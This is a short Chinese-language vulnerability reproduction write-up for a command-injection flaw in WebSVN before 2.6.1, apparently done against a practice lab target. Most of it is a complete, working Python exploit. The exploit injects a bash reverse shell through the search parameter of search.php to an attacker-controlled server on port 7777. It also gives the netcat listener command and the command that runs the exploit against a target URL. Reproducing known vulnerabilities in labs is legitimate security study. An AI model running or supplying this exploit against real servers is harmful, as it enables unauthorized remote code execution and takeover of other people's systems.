一、漏洞概述
Websvn是一个应用软件。一个在线Subversion存储库浏览器,WebSVN 2.6.1之前版本存在安全漏洞,该漏洞允许远程攻击者通过搜索参数中的shell元字符执行任意命令。
二、影响范围
WebSVN 2.6.1之前版本
三、访问页面
四、漏洞复现
1、制作poc.py脚本,91.208.73.100改成自己的vps服务器地址。
import requests
import argparse
from urllib.parse import quote_plus
PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/91.208.73.100/7777 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'
parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")
args = parser.parse_args()
if args.target.startswith("http://") or args.target.startswith("https://"):
target = args.target
else:
print("[!] Target should start with either http:// or https://")
exit()
requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))
print("[*] Request send. Did you get what you wanted?")
2、在vps服务器监听7777端口
nc -lvp 7777
3、执行脚本,123.58.224.8靶场地址。
python poc.py http://123.58.224.8:32790
4、VPS服务器执行RCE